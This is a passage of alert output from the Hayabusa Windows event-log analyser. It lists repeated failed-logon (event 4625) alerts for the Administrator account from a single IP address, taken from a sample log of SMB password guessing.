NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rmxFpEQeGsgbXpDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfIVCOOWQS7TNKQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uweLaLhvznDee1IF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oNQcS2BonF12ikiX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D43Flf2keSL3aph6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zw7nJXNHZ2QNa3In | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UZp4567BIWAwxF9r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S9iVvPuykq62pV9z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRVomETC34InuKPk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VpHfjKgAxChSYz8R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tIbTy5IDRy90lbUR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mM6Olq0zYkMlwmrb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mUehtGEh0EqRHiLP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhZ2KHmCTonGrXSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZea5qiet7vrT3iv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aNWY8kuJMSy8h0Zk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bt9DUQ0mwhkJlTt8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zXYtsM2MMuNSYtVr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgzvsdMN2SU7Knlh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxiBYXNCY32yNb6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVfJmOxvsp75g3a0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uHp1hlHjD8w3WKt3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: dEeJWAJgOeueYSM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tOfPGoUXu932L80d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NbH4R6GK1PIVT3ij | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PgsJokRd07Nh1lO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 11ylyxQyV5HCJ18g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Am2qI1ya4wYdqErV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2AmZsYUYmDpWZE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c0Hd8xWxOxFifJBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlh64Gtfoig2uzOY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LtK8Hj2kf3dfFSnW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VKUPqxtNqkVqXgTg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SKSxp87CBg8L8wSi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CpvxvR0ftQs1gdEF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9RGDzNMt9fM6rLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RvOO9NLhbbKJXQq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mDB9bIx7LcoJ6IAU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfJWsGqlQTmFUUPT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 9PRIO3MASsjrdQGs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P9QCn4nZHB0ENeA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4iUNHB1gE2d1dBfZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tM3IdtrLdVXQjOjB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dbmn9Er9e1JZZybc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SY40ARcAoo9cWQIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fc7m0blzidQfn1BU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 13SkGPbDDXou7qLA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YIlJeZpJlvcKgqt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BRhH6atcwLcGmrB4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGIInLsy4UCfl0oW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4qJ7nEN0u9DkVuVH | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6qb85lEENmrj4ebF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6RXAj26rnxMmxuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tas7cqRNGQw6FlVX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQlF8GYIeWytFLsJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dj48ftx52s1HntRT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: B46vTS9PxUgUblBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoIFbywJEC0QaceV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSXqaP0i1eeKQOmX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gke4vfzIAC3k0yXU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.919 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZnjxfeIX4ra6vmBA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ChR30FLLOT3Pvapv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:51:25.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VkepVf00vkpVp9yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5i2AxYxwCX6DvP3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8Fvcw2mQBI61mxH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAazyOpBig2G3Z78 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1g3rjPQQAXEK2yz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BC68zrAEF6L00xS | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
